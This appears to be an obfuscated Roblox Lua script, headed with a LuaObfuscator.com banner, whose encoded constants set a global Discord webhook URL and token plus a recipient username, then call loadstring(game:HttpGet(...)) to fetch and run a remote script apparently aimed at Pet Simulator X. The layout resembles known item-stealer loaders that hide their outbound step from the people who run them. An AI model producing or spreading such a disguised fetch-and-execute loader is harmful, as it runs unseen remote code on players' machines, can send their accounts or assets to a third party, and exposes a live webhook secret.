--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=v2(v0(v30,16));if v19 then local v78=0;local v79;while true do if (v78==1) then return v79;end if (v78==0) then v79=v5(v70,v19);v19=nil;v78=1;end end else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=0 -0 ;local v72;while true do if (v71==(0 -0)) then v72=(v31/((3 -1)^(v32-(2 -1))))%(((885 -264) -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-((1634 -(68 + 997)) -(367 + 201)))) + (928 -(214 + 713)))) ;return v72-(v72%(1 + 0)) ;end end else local v73=((1271 -(226 + 1044)) + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v73 + v73))>=v73) and (1638 -((6631 -5108) + 114))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23()local v37=0 + 0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(958 -(892 + 65))) then return (v41 * (40022563 -(92388336 -69142989))) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end if (v37==(350 -(87 + 263))) then v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;v37=2 -1 ;end end end local function v24()local v42=v23();local v43=v23();local v44=953 -(802 + 150) ;local v45=(v20(v43,2 -1 ,36 -16 ) * ((2 + 0)^(1029 -(915 + (315 -233))))) + v42 ;local v46=v20(v43,(501 -(416 + 26)) -38 ,19 + 12 );local v47=((v20(v43,41 -9 )==1) and  -1) or (1188 -(1069 + 118)) ;if (v46==0) then if (v45==(0 -0)) then return v47 * (0 -(0 -0)) ;else v46=1 + 0 + 0 ;v44=0 -0 ;end elseif (v46==2047) then return ((v45==((0 -0) + 0)) and (v47 * (1/0))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(368 + 423)) ) * (v44 + (v45/((6 -4)^(70 -(10 + 8))))) ;end local function v25(v48)local v49;if  not v48 then local v74=(1210 -(201 + 571)) -(145 + 293) ;while true do if (v74==(430 -(44 + 386))) then v48=v23();if (v48==(1486 -(998 + (1626 -(116 + 1022))))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1 + (0 -0)) );v18=v18 + v48 ;local v50={};for v68=1 + 0 , #v49 do v50[v68]=v2(v1(v3(v49,v68,v68)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((5 -3)==v51) then v56=nil;v57=nil;v51=3;end if (v51==3) then v58=nil;v59=nil;v51=10 -6 ;end if (v51==(118 -(4 + 110))) then v60=nil;while true do if (v52==(585 -(57 + 527))) then local v97=1427 -(41 + 1386) ;while true do if (0==v97) then v55=nil;v56=nil;v97=104 -(17 + 86) ;end if (1==v97) then v52=2 + 0 ;break;end end end if (0~=v52) then else local v98=0;while true do if (v98==(0 -0)) then v53=0;v54=nil;v98=2 -1 ;end if (v98==(167 -(122 + 44))) then v52=1;break;end end end if (v52==(6 -2)) then while true do if (v53==(3 -2)) then local v103=0;local v104;while true do if (v103==(0 + 0)) then v104=0 + 0 ;while true do if (v104~=(0 -0)) then else v56=nil;v57=nil;v104=1;end if (v104==(66 -(30 + 35))) then v53=2;break;end end break;end end end if (v53~=(2 + 0)) then else local v105=0;while true do if (v105==1) then v53=1260 -(1043 + 214) ;break;end if (v105==(0 -0)) then v58=nil;v59=nil;v105=1213 -(323 + 889) ;end end end if (v53~=0) then else local v106=0;while true do if (v106==0) then local v119=0 -0 ;while true do if (v119==1) then v106=1;break;end if (v119==0) then v54=0;v55=nil;v119=1;end end end if (v106==1) then v53=1;break;end end end if (v53~=(583 -(361 + 219))) then else v60=nil;while true do local v107=320 -(53 + 267) ;local v108;while true do if (v107~=(0 + 0)) then else v108=0;while true do if (v108~=(413 -(15 + 398))) then else local v145=982 -(18 + 964) ;local v146;while true do if (v145==(0 -0)) then v146=0 + 0 ;while true do if (v146~=0) then else local v176=0 + 0 ;while true do if (v176==(850 -(20 + 830))) then if (v54~=(2 + 0)) then else local v180=126 -(116 + 10) ;local v181;while true do if (0~=v180) then else v181=0;while true do if (1~=v181) then else for v188=1,v23() do local v189=0;local v190;local v191;while true do if (v189==0) then local v198=0;while true do if ((1 + 0)==v198) then v189=739 -(542 + 196) ;break;end if (v198~=0) then else v190=0 -0 ;v191=nil;v198=1;end end end if (v189~=1) then else while true do if (v190~=0) then else v191=v21();if (v20(v191,1 + 0 ,1)==0) then local v202=0 + 0 ;local v203;local v204;local v205;local v206;local v207;while true do if (v202~=(1 + 0)) then else v205=nil;v206=nil;v202=2;end if (v202~=(0 -0)) then else v203=0;v204=nil;v202=1;end if (v202==2) then v207=nil;while true do if (v203~=(2 -1)) then else local v213=1551 -(1126 + 425) ;while true do if (v213~=0) then else v206=nil;v207=nil;v213=406 -(118 + 287) ;end if (v213==(3 -2)) then v203=1123 -(118 + 1003) ;break;end end end if (v203~=(5 -3)) then else while true do if (v204==(378 -(142 + 235))) then local v216=0 -0 ;local v217;local v218;while true do if (v216~=(0 + 0)) then else v217=977 -(553 + 424) ;v218=nil;v216=1;end if (v216~=(1 -0)) then else while true do if (v217~=0) then else v218=0 + 0 ;while true do if (v218==(0 + 0)) then local v230=0;while true do if (v230==0) then v207={v22(),v22(),nil,nil};if (v205==0) then local v232=0 + 0 ;local v233;local v234;local v235;while true do if (v232~=(0 -0)) then else v233=0;v234=nil;v232=1;end if (v232==(2 -1)) then v235=nil;while true do if (v233==0) then v234=0;v235=nil;v233=1;end if (v233==(2 -1)) then while true do if (v234~=0) then else v235=0 + 0 ;while true do if (0==v235) then v207[14 -11 ]=v22();v207[757 -(239 + 514) ]=v22();break;end end break;end end break;end end break;end end elseif (v205==(1 + 0)) then v207[1332 -(797 + 532) ]=v23();elseif (v205==2) then v207[3]=v23() -((2 + 0)^(6 + 10)) ;elseif (v205==3) then local v242=0;local v243;while true do if (v242~=0) then else v243=0 -0 ;while true do if (v243==0) then v207[3]=v23() -((1204 -(373 + 829))^(747 -(476 + 255))) ;v207[1134 -(369 + 761) ]=v22();break;end end break;end end end v230=1 + 0 ;end if (v230~=1) then else v218=1 -0 ;break;end end end if (v218~=1) then else v204=3 -1 ;break;end end break;end end break;end end end if (v204==(241 -(64 + 174))) then if (v20(v206,1 + 2 ,3 -0 )~=(337 -(144 + 192))) then else v207[220 -(42 + 174) ]=v60[v207[4]];end v55[v188]=v207;break;end if (v204~=2) then else local v220=0 + 0 ;while true do if ((0 + 0)==v220) then local v225=0 + 0 ;local v226;while true do if (v225==(1504 -(363 + 1141))) then v226=1580 -(1183 + 397) ;while true do if (v226~=1) then else v220=2 -1 ;break;end if (v226==0) then local v231=0 + 0 ;while true do if (v231==(0 + 0)) then if (v20(v206,1976 -(1913 + 62) ,1 + 0 )==1) then v207[5 -3 ]=v60[v207[2]];end if (v20(v206,2,1935 -(565 + 1368) )~=(3 -2)) then else v207[1664 -(1477 + 184) ]=v60[v207[3 -0 ]];end v231=1 + 0 ;end if (v231==(857 -(564 + 292))) then v226=1;break;end end end end break;end end end if (v220==(1 -0)) then v204=3;break;end end end if (v204==0) then local v221=0;while true do if (v221~=(0 -0)) then else local v227=304 -(244 + 60) ;local v228;while true do if (v227~=(0 + 0)) then else v228=476 -(41 + 435) ;while true do if (0~=v228) then else v205=v20(v191,1003 -(938 + 63) ,3 + 0 );v206=v20(v191,4,6);v228=1126 -(936 + 189) ;end if ((1 + 0)==v228) then v221=1614 -(1565 + 48) ;break;end end break;end end end if (v221==(1 + 0)) then v204=1139 -(782 + 356) ;break;end end end end break;end if ((267 -(176 + 91))==v203) then local v214=0;local v215;while true do if (v214==(0 -0)) then v215=0;while true do if (v215==0) then local v229=0;while true do if (v229==0) then v204=0 -0 ;v205=nil;v229=1093 -(975 + 117) ;end if (v229==1) then v215=1876 -(157 + 1718) ;break;end end end if (v215==1) then v203=1 + 0 ;break;end end break;end end end end break;end end end break;end end break;end end end v54=3;break;end if (v181~=0) then else for v192=1,v59 do local v193=0 -0 ;local v194;local v195;local v196;local v197;while true do if (v193==2) then while true do if (v194~=0) then else local v201=0 -0 ;while true do if (v201==(1019 -(697 + 321))) then v194=2 -1 ;break;end if (v201==(0 -0)) then local v208=0 -0 ;while true do if (v208~=(0 + 0)) then else v195=0 -0 ;v196=nil;v208=1;end if (v208==(2 -1)) then v201=1;break;end end end end end if (v194==(1228 -(322 + 905))) then v197=nil;while true do if (v195~=1) then else if (v196==(612 -(602 + 9))) then v197=v21()~=0 ;elseif (v196==2) then v197=v24();elseif (v196==(1192 -(449 + 740))) then v197=v25();end v60[v192]=v197;break;end if (v195~=0) then else local v210=0;local v211;local v212;while true do if (v210==(873 -(826 + 46))) then while true do if (v211==(947 -(245 + 702))) then v212=0;while true do if (0~=v212) then else local v222=0;while true do if (v222~=0) then else v196=v21();v197=nil;v222=3 -2 ;end if ((1 + 0)==v222) then v212=1;break;end end end if ((1899 -(260 + 1638))==v212) then v195=1;break;end end break;end end break;end if (v210~=0) then else v211=440 -(382 + 58) ;v212=nil;v210=1;end end end end break;end end break;end if (v193==0) then v194=0;v195=nil;v193=1;end if (v193==(3 -2)) then v196=nil;v197=nil;v193=2;end end end v58[3]=v21();v181=1 + 0 ;end end break;end end end if ((5 -2)==v54) then local v182=0 -0 ;local v183;while true do if ((1205 -(902 + 303))==v182) then v183=0;while true do if ((0 -0)~=v183) then else local v187=0;while true do if (v187~=(0 -0)) then else for v199=1,v23() do v56[v199-(1 + 0) ]=v28();end return v58;end end end end break;end end end v176=1;end if (v176==(1691 -(1121 + 569))) then v146=215 -(22 + 192) ;break;end end end if (1~=v146) then else v108=1;break;end end break;end end end if (v108~=1) then else if (v54==1) then local v170=0;local v171;while true do if (v170==(683 -(483 + 200))) then v171=1463 -(1404 + 59) ;while true do if (v171==(0 -0)) then local v177=0;local v178;while true do if (v177==(0 -0)) then v178=0;while true do if (v178~=1) then else v171=1;break;end if (v178==0) then local v185=0;while true do if (v185==1) then v178=1;break;end if (v185==(765 -(468 + 297))) then v58={v55,v56,nil,v57};v59=v23();v185=2 -1 ;end end end end break;end end end if (v171~=1) then else v60={};v54=2 -0 ;break;end end break;end end end if (v54==(0 + 0)) then local v172=236 -(141 + 95) ;local v173;while true do if (0~=v172) then else v173=0 + 0 ;while true do if (v173==(2 -1)) then v57={};v54=2 -1 ;break;end if (v173==0) then local v179=0 + 0 ;while true do if (v179~=(2 -1)) then else v173=1;break;end if (0~=v179) then else local v184=0 + 0 ;while true do if (v184==1) then v179=1 + 0 ;break;end if (0==v184) then v55={};v56={};v184=1 -0 ;end end end end end end break;end end end break;end end break;end end end break;end end break;end if (v52~=(2 + 0)) then else v57=nil;v58=nil;v52=3;end if (v52==3) then v59=nil;v60=nil;v52=4;end end break;end if (v51==(164 -(92 + 71))) then v54=nil;v55=nil;v51=2;end if (v51==(0 + 0)) then v52=0 -0 ;v53=nil;v51=766 -(574 + 191) ;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v80=v65;local v81=v66;local v82=v67;local v83=v27;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=5) then if (v93<=2) then if (v93<=0) then v90[v92[2]]=v63[v92[3]];elseif (v93>1) then v90[v92[2]][v92[3]]=v92[4];else v84=v92[3];end elseif (v93<=3) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v63[v92[3]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v84=v92[3];elseif (v93==4) then v90[v92[2]]=v92[3]~=0 ;else do return;end end elseif (v93<=8) then if (v93<=6) then v90[v92[2]]=v92[3];elseif (v93==7) then local v124=v92[2];local v125,v126=v83(v90[v124](v13(v90,v124 + 1 ,v92[3])));v85=(v126 + v124) -1 ;local v127=0;for v141=v124,v85 do v127=v127 + 1 ;v90[v141]=v125[v127];end else local v128=0;local v129;local v130;local v131;local v132;local v133;while true do if (v128==2) then v92=v80[v84];v133=v92[2];v132=v90[v92[3]];v90[v133 + 1 ]=v132;v90[v133]=v132[v92[4]];v84=v84 + 1 ;v128=3;end if (v128==0) then v129=nil;v130,v131=nil;v132=nil;v133=nil;v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v128=1;end if (v128==6) then v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];v84=v92[3];break;end if (v128==4) then v92=v80[v84];v133=v92[2];v130,v131=v83(v90[v133](v13(v90,v133 + 1 ,v92[3])));v85=(v131 + v133) -1 ;v129=0;for v168=v133,v85 do local v169=0;while true do if (0==v169) then v129=v129 + 1 ;v90[v168]=v130[v129];break;end end end v128=5;end if (v128==3) then v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3]~=0 ;v84=v84 + 1 ;v128=4;end if (v128==5) then v84=v84 + 1 ;v92=v80[v84];v133=v92[2];v90[v133]=v90[v133](v13(v90,v133 + 1 ,v85));v84=v84 + 1 ;v92=v80[v84];v128=6;end if (v128==1) then v92=v80[v84];v90[v92[2]]=v63[v92[3]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v63[v92[3]];v84=v84 + 1 ;v128=2;end end end elseif (v93<=10) then if (v93>9) then local v134=v92[2];v90[v134]=v90[v134](v13(v90,v134 + 1 ,v85));else local v136=v92[2];local v137=v90[v92[3]];v90[v136 + 1 ]=v137;v90[v136]=v137[v92[4]];end elseif (v93==11) then v90[v92[2]]();elseif (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end v84=v84 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3130343139333637362O383135313038312F6C3871366C6A556A5763535A543742384D36546157375756654E2D64626B44496256476D797273344B6F4C4D67576B4F382O69712D756D573077457A3043554B48675277030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585363726970745A5053582F6D61696E2F5073584C79706865725803083O00557365724E616D65030A3O00416B6F73697261696E7A03093O00557365724E616D653200173O0012063O00013O00260C3O000E000100020004013O000E000100122O000100033O00300800010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O0016000100260C3O0001000100010004013O0001000100122O000100033O0030030001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00053O00017O00",v9(),...);end
